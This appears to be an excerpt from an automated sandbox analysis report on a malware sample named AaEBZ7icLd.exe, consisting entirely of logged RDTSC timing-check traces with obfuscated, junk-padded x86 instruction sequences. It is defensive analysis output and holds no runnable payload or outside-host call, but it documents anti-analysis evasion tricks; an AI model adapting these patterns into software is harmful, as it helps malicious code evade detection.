                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F978A second address: 5F978E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F978E second address: 5F9792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F9792 second address: 5F9801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F909CBB3518h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jmp 00007F909CBB3525h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F909CBB3518h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov edi, edx 0x00000048 movzx edi, di 0x0000004b xchg eax, esi 0x0000004c je 00007F909CBB3535h 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F781C second address: 5F7820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F7820 second address: 5F7826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FB8DA second address: 5FB8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD319h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FC8E5 second address: 5FC8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FC8E9 second address: 5FC909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F909C7BD317h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FA986 second address: 5FA98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FAA1B second address: 5FAA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F909C7BD306h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F909C7BD311h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FAA3F second address: 5FAA44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FAA44 second address: 5FAA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FD79A second address: 5FD79E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FD79E second address: 5FD7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FD7A4 second address: 5FD7BE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F909CBB3518h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jng 00007F909CBB3518h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FD7BE second address: 5FD7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FBB58 second address: 5FBB5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FE56A second address: 5FE574 instructions: 0x00000000 rdtsc 0x00000002 je 00007F909C7BD30Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FF56B second address: 5FF574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 600599 second address: 60059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FE68B second address: 5FE68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FE68F second address: 5FE695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 60363E second address: 6036E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push ebx 0x0000000e jmp 00007F909CBB3522h 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F909CBB3518h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D24D3h], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F909CBB3518h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 call 00007F909CBB3520h 0x00000057 xor dword ptr [ebp+124681B6h], edx 0x0000005d pop ebx 0x0000005e and edi, 122FD282h 0x00000064 xchg eax, esi 0x00000065 pushad 0x00000066 jp 00007F909CBB3528h 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FCA28 second address: 5FCA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FCA2E second address: 5FCA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FCA33 second address: 5FCA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD30Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6027AF second address: 6027B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 60391B second address: 603925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F909C7BD306h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 603925 second address: 60393F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F909CBB351Bh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 60BF8D second address: 60BF98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F909C7BD306h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A99DD second address: 5A99E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A99E1 second address: 5A99ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A99ED second address: 5A99F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 60B8D4 second address: 60B904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD317h 0x00000007 jmp 00007F909C7BD30Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 60B904 second address: 60B908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 60B908 second address: 60B922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD314h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 61051F second address: 610546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F909CBB351Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007F909CBB3516h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 610546 second address: 61054C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 612753 second address: 612781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007F909CBB351Ch 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push ebx 0x0000001a jmp 00007F909CBB351Fh 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 612781 second address: 612785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6165C1 second address: 6165CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6165CA second address: 6165FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909C7BD306h 0x0000000a jmp 00007F909C7BD314h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F909C7BD308h 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push edx 0x0000001f pop edx 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6165FC second address: 616603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 616603 second address: 61662E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD30Ah 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F909C7BD319h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 616EE0 second address: 616EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 616EE9 second address: 616F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F909C7BD30Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 616F02 second address: 616F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 616F06 second address: 616F10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F909C7BD306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 61707B second address: 61708A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F909CBB3516h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 61708A second address: 61709C instructions: 0x00000000 rdtsc 0x00000002 js 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F909C7BD312h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 61709C second address: 6170A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6171C5 second address: 6171D9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jns 00007F909C7BD306h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6171D9 second address: 6171DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6174C7 second address: 6174CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 61CDCD second address: 61CDD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 621DF1 second address: 621DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62249F second address: 6224A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6227F5 second address: 622812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F909C7BD313h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 622812 second address: 622816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 622936 second address: 62293F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 622A99 second address: 622AA5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F909CBB3516h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 622AA5 second address: 622AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD30Fh 0x00000009 jmp 00007F909C7BD310h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 622C3D second address: 622C7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F909CBB3516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F909CBB3522h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F909CBB352Eh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 622DC9 second address: 622DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5D4135 second address: 5D4139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 628D6C second address: 628D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909C7BD306h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 628D76 second address: 628D80 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F909CBB3516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 628D80 second address: 628D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F909C7BD30Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 627C5D second address: 627C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F909CBB3516h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F909CBB3521h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 628206 second address: 628216 instructions: 0x00000000 rdtsc 0x00000002 js 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 628216 second address: 62821A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 627833 second address: 627837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 627837 second address: 627849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F909CBB351Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62864A second address: 628652 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 628A3B second address: 628A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62D544 second address: 62D552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F909C7BD306h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A15AB second address: 5A15AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A15AF second address: 5A15C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F909C7BD306h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A15C4 second address: 5A15C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A15C9 second address: 5A15DB instructions: 0x00000000 rdtsc 0x00000002 je 00007F909C7BD30Ch 0x00000008 jnc 00007F909C7BD306h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A15DB second address: 5A15DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E9841 second address: 5E9845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E9BD8 second address: 5E9BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E9F4E second address: 5E9FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F909C7BD306h 0x0000000a popad 0x0000000b je 00007F909C7BD30Ch 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007F909C7BD319h 0x0000001a push 0000001Eh 0x0000001c add edi, 697F740Fh 0x00000022 add ecx, dword ptr [ebp+122D3568h] 0x00000028 nop 0x00000029 jmp 00007F909C7BD313h 0x0000002e push eax 0x0000002f pushad 0x00000030 jnp 00007F909C7BD308h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E9FB2 second address: 5E9FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA0F1 second address: 5EA0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA2F5 second address: 5EA2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA2F9 second address: 5EA362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jmp 00007F909C7BD315h 0x00000010 nop 0x00000011 jl 00007F909C7BD30Ch 0x00000017 mov dword ptr [ebp+122D2E22h], edx 0x0000001d or dx, ABD6h 0x00000022 lea eax, dword ptr [ebp+12483E61h] 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F909C7BD308h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 mov cx, D942h 0x00000046 nop 0x00000047 js 00007F909C7BD30Eh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA362 second address: 5EA36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
